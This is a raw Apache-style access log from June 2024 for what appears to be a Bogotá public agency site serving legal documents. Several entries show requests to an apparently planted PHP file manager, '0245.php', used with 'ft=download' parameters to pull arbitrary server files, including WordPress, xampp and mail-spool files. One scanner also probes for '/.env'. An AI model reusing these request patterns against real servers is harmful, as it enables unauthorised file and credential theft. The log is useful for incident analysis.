201.245.192.253 - - [21/Jun/2024:01:00:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [21/Jun/2024:01:01:02 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-046-99.docx HTTP/1.1" 304 -
201.245.192.253 - - [21/Jun/2024:01:01:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.123.133 - - [21/Jun/2024:01:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3054.pdf&ft=img&white=1 HTTP/1.1" 200 401167
157.55.39.49 - - [21/Jun/2024:01:01:53 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2003%2FRES+2003+1801-1850%2F HTTP/1.1" 200 12154
201.245.192.253 - - [21/Jun/2024:01:02:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:01:02:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.33.54 - - [21/Jun/2024:01:02:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes&f=date.php&ft=download HTTP/1.1" 200 35209
201.245.192.253 - - [21/Jun/2024:01:02:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
78.153.140.179 - - [21/Jun/2024:01:02:42 -0500] "\x16\x03\x01" 400 226
78.153.140.179 - - [21/Jun/2024:01:02:42 -0500] "GET /.env HTTP/1.1" 404 1018
216.245.221.92 - - [21/Jun/2024:01:03:19 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Jun/2024:01:01:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.116.42 - - [21/Jun/2024:01:03:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=guestbook-sl.pl&ft=download HTTP/1.1" 200 3361
201.245.192.253 - - [21/Jun/2024:01:03:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:01:03:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
201.245.192.253 - - [21/Jun/2024:01:04:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [21/Jun/2024:01:02:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59583
47.128.116.7 - - [21/Jun/2024:01:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion2020%5CLicencia+Ambiental%5C&f=PM04-PR99-M1Lista+proyectos+obras+actividades+sujetas+a+licenciamiento+ambiental.doc&ft=download HTTP/1.1" 200 73216
201.245.192.253 - - [21/Jun/2024:01:04:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:01:04:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
3.20.63.178 - - [21/Jun/2024:01:04:40 -0500] "HEAD / HTTP/1.1" 200 -
47.128.25.205 - - [21/Jun/2024:01:05:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=template.php&ft=download HTTP/1.1" 200 13558
201.245.192.253 - - [21/Jun/2024:01:05:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
44.227.38.253 - - [21/Jun/2024:01:05:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:01:06:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.19.50 - - [21/Jun/2024:01:06:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=stdsub_3.mer&ft=download HTTP/1.1" 200 3816
201.245.192.253 - - [21/Jun/2024:01:06:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:01:06:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.48.59 - - [21/Jun/2024:01:07:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1623.pdf&ft=img&white=1 HTTP/1.1" 200 433935
201.245.192.253 - - [21/Jun/2024:01:07:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.55.39.49 - - [21/Jun/2024:01:07:52 -0500] "GET /BLA/resoluciones/AUTOS%202022/4985.pdf HTTP/1.1" 200 416048
201.245.192.253 - - [21/Jun/2024:01:08:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.27.95 - - [21/Jun/2024:01:08:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800%5C&f=00001765.tif&white=1 HTTP/1.1" 200 241412
216.245.221.92 - - [21/Jun/2024:01:08:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:01:08:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:01:08:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
201.245.192.253 - - [21/Jun/2024:01:08:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.127.99 - - [21/Jun/2024:01:09:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6198.pdf&ft=download HTTP/1.1" 200 593575
172.22.2.4 - - [21/Jun/2024:01:07:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.62 - - [21/Jun/2024:01:09:13 -0500] "GET /inicia-el-2024-conociendo-la-biodiversidad-de-bogoti.html HTTP/1.1" 200 894
172.22.2.4 - - [21/Jun/2024:01:09:14 -0500] "GET /BLA/boletinlegal/conceptos/2013/147.pdf HTTP/1.1" 304 -
201.245.192.253 - - [21/Jun/2024:01:09:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.12.251.153 - - [21/Jun/2024:01:09:57 -0500] "HEAD / HTTP/1.1" 200 -
47.128.18.122 - - [21/Jun/2024:01:09:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=svg-painter.min.js&ft=download&white=1 HTTP/1.1" 200 2408
172.22.2.4 - - [21/Jun/2024:01:08:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51561
201.245.192.253 - - [21/Jun/2024:01:10:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:01:10:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:01:10:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.30.133 - - [21/Jun/2024:01:10:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=stdsubw2.mer&ft=download HTTP/1.1" 200 2514
40.77.167.67 - - [21/Jun/2024:01:11:07 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2024%2F HTTP/1.1" 200 24209
